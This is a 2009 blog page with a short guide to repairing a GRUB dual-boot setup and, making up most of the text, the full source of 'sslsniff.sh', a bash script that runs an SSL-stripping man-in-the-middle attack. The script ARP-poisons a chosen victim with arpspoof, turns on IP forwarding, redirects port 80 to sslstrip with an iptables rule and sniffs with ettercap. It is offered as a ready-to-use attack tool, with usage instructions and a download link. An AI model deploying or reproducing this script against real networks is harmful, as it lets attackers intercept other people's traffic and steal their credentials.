Longjidin's Kg Lengkong to Bukit Lada

Repair bootloader dualboot BackTrack 4 with Windows xxx

Posted in BackTrack by longjidin on November 19, 2009

Follow these simple steps.

Before continuing, mount all hard drive partitions; the steps below only work once they are mounted. Remember: MOUNT all hard drives first!

———————————————————————————————————————–

- OK open shell as a root then type:-

# cd /boot/grub ENTER

- then type :-

# grub ENTER

- then type:-

#find /boot/grub/stage1 ENTER

- this command reports the partition that holds the GRUB files, for example (hd0,1), (hd0,2) or (hd0,3).

- for example, on my machine the result is (hd0,2); use the value that find printed on yours in the next command.

- then type :-

# root (hd0,2) ENTER
# setup (hd0) ENTER

- Ok done then type:-

# quit ENTER

- Reboot the machine now and check whether the bootloader is working.

- The BackTrack GRUB menu should now appear normally, just as it did before.


sslsniff.sh script

Posted in BackTrack by longjidin on November 15, 2009

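This is a script for SSL sniffing: it starts arpspoof, sslstrip and ettercap, and while it runs it changes ip_forward, adds an iptables NAT redirect rule and edits etter.conf.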
ToDO:
- ensure ip_forward is always set

General Usage:
./sslsniff.sh -v <ip of target> -g <ip of gateway>
-v and -g are the only required flags; the rest are optional.
If -s is not specified, sslstrip uses port 10000, the script's default.
Use -h for help.

Download: mediafire.com/?nmtz2tjvuyj
Code:
#!/bin/bash
#
# Synopsis:	A program to sniff traffic in an SSL connection
# Author:		thims (thims DOT local AT gmail DOT com)
# Version:	0.3
# Date:			20091107
# Comments:
#		ToDO:

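# Defaults. victim and gateway stay empty until given on the command line
# (initialize refuses to run without them).
# iface is initialised as well, so a variable of the same name inherited from
# the calling environment is never picked up when -i is not given.
victim=
gateway=
iface=
sslPort=10000
etterConf=/etc/etter.conf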

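# Print the option summary to stdout.
# Arguments: none
# Outputs:   usage text; $0 is expanded into the first line
# The option spellings listed here are the ones the option parser of this
# script accepts ("-i," was misprinted as "-i." and the gateway long form
# is --gw, not --gateway).
function help() {
cat << EOF
Usage: $0 [args] host
    -h, --help     -  Print this help and exit
    -i, --iface    -  Interface to use
    -e, --etconf   -  Location of etter.conf on the filesystem
    -v, --victim   -  IP address of desired host
    -g, --gw       -  IP address of network gateway
    -s, --sslport  -  Desired port for sslstrip
EOF
}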

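# Print an optional message and terminate the script.
# Arguments: $1 - message (optional; nothing is printed when it is empty)
# Outputs:   the message on stderr, so it does not mix with normal output
# Exits:     always, with status 1
function die() {
	if [ -n "$1" ] ;then
		# printf instead of echo: a message such as "-n" is printed literally
		printf '%s\n' "$1" >&2
	fi
	exit 1
}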

# Start the command line given in $1 in the background under nohup, wait five
# seconds, then report whether a matching process can be found.
# Globals:   cmd, pid (both written; neither is declared local)
# Arguments: $1 - the whole command line as ONE string. It is expanded
#                 unquoted below, so the shell word-splits (and globs) it into
#                 program and arguments. Further arguments are ignored.
# Returns:   0 if a PID was found after the wait, 1 otherwise
function noHup() {
	cmd="$1"
	# stdout and stderr of the child are both discarded, so a start-up error
	# is only noticed through the PID lookup further down
	nohup $cmd > /dev/null &> /dev/null &
	sleep 5
	# sslstrip runs under the python interpreter, so pidof on the name
	# "sslstrip" does not find it; search the process list instead
	if [ $(echo "$cmd" | awk -F" " '{print $1}') == "sslstrip" ] ;then
		# every ps line containing both "python" and "sslstrip" contributes a
		# PID, so more than one PID can end up in $pid
		pid=$(ps ax | grep python | grep sslstrip | awk -F " " '{print $1}')
	else
		# look the process up by the first word of the command string
		pid=$(pidof $(echo "$1" | awk -F" " '{print $1}'))
	fi

	# an empty lookup result is treated as "the program did not start"
	if [ -z "$pid" ] ;then
		return 1
	else
		return 0
	fi
}

# Start arpspoof in the background through noHup and record its PID.
# Globals:   iface, victim, gateway (read)
# Outputs:   progress text on stdout
# Files:     writes /var/run/sslsniff.arpspoof.run (read again by cleanUp)
# Exits through die when noHup reports that no arpspoof process was found.
function spoofMac() {
	echo -n "Poisoning the victim...."
	# NOTE(review): the inner double quotes close and reopen the string, so
	# $iface, $victim and $gateway are expanded unquoted and are word-split
	# before noHup is called; noHup itself reads only its first argument.
	noHup "arpspoof "$iface" -t "$victim" "$gateway""
	if [ $? -gt 0 ] ;then
		die "Error: could not initiate arpspoof. Dieing..."
	fi
	# PID file; left behind on disk if the script never reaches cleanUp
	echo $(pidof arpspoof) > /var/run/sslsniff.arpspoof.run
	echo "Ok"
}

# Enable IPv4 forwarding, redirect TCP port 80 to $sslPort and start sslstrip
# on that port through noHup.
# Globals:   sslPort (read)
# Host state changed here (what to look for on a machine this ran on):
#   - /proc/sys/net/ipv4/ip_forward is set to 1
#   - a REDIRECT rule is appended to the nat PREROUTING chain
#   - /var/run/sslsniff.sslstrip.run holds the sslstrip PID
# Exits through die when noHup reports that no sslstrip process was found.
function sslInit() {
	echo -n "Setting up SSL intercept...."
	# the previous value of ip_forward is not saved anywhere
	echo 1 > /proc/sys/net/ipv4/ip_forward
	# ensure that ip_forward is set: keep writing until it no longer reads 0
	while [ $(cat /proc/sys/net/ipv4/ip_forward) == 0 ]
	do
		echo 1 > /proc/sys/net/ipv4/ip_forward
	done

	# the rule is added before sslstrip is confirmed to be running; if die is
	# taken below, the rule and the ip_forward change stay in place
	iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-ports "$sslPort"
	noHup "sslstrip -a -f -k -l "$sslPort""
	if [ $? -gt 0 ] ;then
		die "Error: could not initiate sslstrip. Dieing..."
	fi
	# same process-list lookup as in noHup; the result is stored for cleanUp
	echo $(ps ax | grep python | grep sslstrip | awk -F " " '{print $1}') > /var/run/sslsniff.sslstrip.run
	echo "Ok"
}

# Uncomment the iptables redirect lines in etter.conf, then run ettercap in
# the foreground.
# Globals:   etterConf, iface (read)
# Files:     $etterConf is edited in place (sed -i); no backup copy is made
# Returns:   the exit status of ettercap
function capture() {
	local matches num

	# line numbers of every line that mentions both "redir" (any case) and
	# "iptables"
	matches=$(grep -in redir "$etterConf" | grep iptables | awk -F: '{print $1}')

	# strip the first "#" found on each of those lines
	for num in $matches
	do
		sed -i "${num}s/#//" "$etterConf"
	done

	echo -n "Starting to sniff...."
	ettercap -T -q "$iface"
}

# Undo the changes made by spoofMac, sslInit and capture: stop both background
# processes, delete their PID files, remove the iptables rule, switch
# forwarding off and comment the etter.conf lines again.
# Globals:   sslPort, etterConf (read)
# Outputs:   progress text on stdout
# None of the steps is checked for failure; each "Ok" is printed regardless.
function cleanUp() {
	echo "Cleaning up...."
	echo -n "Closing SSL proxy...."
	# default signal (TERM); the PID file is read without an existence check
	kill $(cat /var/run/sslsniff.sslstrip.run)
	rm /var/run/sslsniff.sslstrip.run
	echo "Ok"
	echo -n "Unpoisoning the victim...."
	# signal 2 (SIGINT) rather than TERM, presumably so that arpspoof can run
	# its own shutdown handling; confirm against arpspoof's documentation
	kill  -n 2 $(cat /var/run/sslsniff.arpspoof.run)
	rm /var/run/sslsniff.arpspoof.run
	echo "Ok"
	echo -n "Removing iptables rule and ip_forwarding...."
	# must match the rule added in sslInit exactly, including $sslPort
	iptables -t nat -D PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-ports "$sslPort"
	# NOTE(review): forwarding is forced to 0 even if it was already 1 before
	# the script ran; the original value was never recorded
	echo 0 > /proc/sys/net/ipv4/ip_forward
	echo "Ok"

	# return etter.conf to the state it was found in
	# NOTE(review): a "#" is prepended to every line matching "redir" and
	# "iptables", whether or not that line was commented out beforehand, and it
	# goes in column 1 rather than where the original "#" stood
	echo -n "Returning etter.conf to the configuration we found it with...."
	for linNum in $(cat "$etterConf" | grep -in redir | grep iptables | awk -F: '{print $1}')
	do
		sed -i $linNum's/^/#/' "$etterConf"
	done
	echo "Ok"
	echo "Have a nice day!"
}

# Entry point: check the required settings, print a summary of the run, then
# execute the stages in order.
# Globals:   victim, gateway, iface, sslPort (read)
# Outputs:   usage text plus an error when an address is missing, otherwise
#            the settings summary followed by the output of each stage
# No trap is installed here, so cleanUp depends on capture returning normally.
function initialize() {
	# both addresses are mandatory; die exits the script, so nothing below
	# this guard runs when either one is empty
	if [ -z "$victim" ] || [ -z "$gateway" ] ;then
		help
		echo
		die "Error: a syntactical one"
	fi

	echo "Enviroment details:"
	echo "    Victim:         " "$victim" "  Ok!"
	echo "    Gateway/Router: " "$gateway" "  OK!"
	echo "    Interface:      " "$iface" "  OK!"
	echo "    SSLStrip port:  " "$sslPort" "  OK!"

	# stages run strictly one after another; capture blocks until ettercap ends
	spoofMac
	sslInit
	capture
	cleanUp
}

# Parse the command line, then start the run.
# Every option that takes a value reads it from "$2", but the loop shifts only
# once per pass, so that value is looked at again as "$1" on the next pass. A
# value that does not start with "-" matches no pattern below and is skipped;
# an empty value matches '' and ends the script with the usage text.
while [ $# -gt 0 ]
do
	case "$1" in
		"-h"|"--help")
			# die without a message: the script exits with status 1 after the help
			help
			die
		;;
		"-v"|"--victim")
			# stored as given; no check that it is an IP address
			victim="$2"
		;;
		"-g"|"--gw")
			# stored as given; no check that it is an IP address
			gateway="$2"
		;;
		"-s"|"--sslport")
			# stored as given; no check that it is a number
			sslPort="$2"
		;;
		"-i"|"--iface")
			# NOTE(review): only an ifconfig exit status of exactly 1 counts as
			# "missing"; any other non-zero status falls into the else branch
			if [ $(ifconfig "$2" &> /dev/null; echo $?) == 1 ] ;then
				die "Error: interface "$2" does not exist!"
			else
				# the option letter is stored together with the name in one string
				iface="-i $2"
			fi
		;;
		"-e"|"--etconf")
			# -e tests for existence only, not for a regular or writable file
			if [ ! -e "$2" ] ;then
				die "Error: specified ettercap conf does not exist!"
			else
				etterConf="$2"
			fi
		;;
		'')
			# an empty argument, including an empty option value seen on the next pass
			help
			echo
			die "Error: a syntactical one"
		;;
		-*)
			# any other word starting with "-"
			help
			echo
			die "Error: a syntactical one"
		;;
	esac
	shift
done

# run the script: validation, the three stages, then cleanup
initialize

thanks to Thims from remote-exploit community

original link :http://forums.remote-exploit.org/programming/28697-sslsniff-sh.html
